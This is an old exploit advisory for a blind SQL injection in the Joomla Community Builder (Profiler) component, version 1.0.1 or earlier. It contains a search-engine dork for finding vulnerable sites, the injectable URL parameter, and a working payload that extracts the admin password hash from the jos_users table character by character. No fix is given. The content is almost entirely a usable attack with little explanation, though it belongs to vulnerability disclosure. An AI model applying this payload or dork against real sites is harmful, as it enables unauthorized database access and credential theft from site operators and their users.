Joomla Community Builder <= 1.0.1 Blind SQL Injection Vulnerability

2008-04-23 00:00:00

#########################################################
# #
# Joomla Component Profiler Blind SQL Injection #
# #
#########################################################


########################################

[~] Vulnerability found by: $hur!k'n
[~] Contact: [email protected]

########################################

[~] ScriptName: "Joomla"
[~] ModuleName: "Profiler"
[~] Version: ?

########################################

[~] DORK: allinurl:com_comprofiler

########################################

[~] Exploit: /index.php?option=com_comprofiler&task=userProfile&user=[SQL]
[~] Example: /index.php?option=com_comprofiler&task=userProfile&user=1/**/and/**/mid((select/**/password/**/from/**/jos_users/**/limit/**/0,1),1,1)/**/</**/Char(97)/*

########################################

#

Fixes

No fixes

In order to submit a new fix you need to be registered.